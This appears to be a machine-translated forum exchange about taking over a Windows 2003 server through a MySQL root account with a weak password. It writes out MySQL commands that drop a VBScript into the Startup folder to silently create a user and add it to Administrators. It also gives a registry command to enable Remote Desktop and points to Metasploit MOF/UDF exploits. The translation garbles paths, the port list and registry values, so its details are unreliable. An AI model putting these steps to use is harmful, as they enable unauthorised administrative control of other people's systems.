Port 80 is only available on the Apache web server Page and does not know the website path.
Windows 03 host
Mysql version: 4.0.13-nt
Is root permission
Apache version: apache httpd 2.0.48
Port 3306 has an external connection and a weak password. You already know the account/password.
The opened port is 135.445.1026.80.256.3306.
Mysql> insert into a values ("set wshshell = createobject (" "wscript. shell "")");
Mysql> insert into a values ("a = wshshell. run ("”cmd.exe/c net user 1/add" ", 0 )");
Mysql> insert into a values ("B = wshshell. run ("”cmd.exe/c net localgroup Administrators 1/add" ", 0 )");
Mysql> select * from a into outfile "c: \ release E ~ 1 \ alluse ~ 1 \ Start Menu \ Program \ Start \ a. vbs ";
It has already been written into the startup Item
There are two questions: How can I run the 3389 command?
How can I restart the other party?
You can run the reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server/v fDenyTSConnections/t REG_DWORD/d 2000/f "command on both 00000000 and 03.
Why don't you directly use MSF for system permissions?
Pose. Semi-knowledge and semi-solution to msf
Is the generated payload converted to hexadecimal and then stored in the startup item?
Msf> search mysql .........................
There is exploit for mof and udf.
Since you have connected to mysql, you can also manually mof or udf